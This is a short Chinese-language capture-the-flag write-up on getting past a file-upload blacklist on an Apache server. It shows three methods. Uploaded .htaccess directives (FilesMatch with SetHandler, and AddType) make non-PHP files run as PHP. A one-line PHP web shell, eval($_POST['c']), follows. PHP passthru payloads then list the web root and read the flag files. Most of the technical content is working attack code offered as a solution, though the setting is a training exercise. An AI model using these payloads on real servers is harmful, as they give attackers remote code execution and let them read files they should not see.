htaccess文件是Apache服务器中的一个配置文件，它负责相关目录下的网页配置。通过htaccess文件，可以帮我们实现：网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能
康康源代码，有黑名单限制

方法一

上传.htacess文件，内容为

<FilesMatch "is">
setHandler application/x-httpd-php
</FilesMatch> 

上传一句话木马c.is

<?php eval($_POST['c']);?>

每次做完都喜欢去康康其他人怎么做的

方法二

https://www.cnblogs.com/anweilx/p/12523582.html
我上面的那种方式时文件名的正则匹配，这位大佬还给出了另一种后缀匹配

AddType application/x-httpd-php .jpg

方法三

https://blog.csdn.net/weixin_42742658/article/details/106132770
这个是不利用webshell工具来获得（要上传两次文件，利用命令执行）

<?php 
#passthru("ls /var/www/html/"); //第一次只写这一行，用来找flag文件在哪里
passthru("cat /var/www/html/flag_229326633.php");//第二次是找到了flag文件之后，直接读取内容
?>

方法三改进

然后为了不这么麻烦我就改进了一下
上传a.php

<?php
    passthru("ls /var/www/html/");//查看目录下有什么文件
	passthru("cd /var/www/html/;cat flag*");//查看以flag开头的文件的内容
?>

右键查看源代码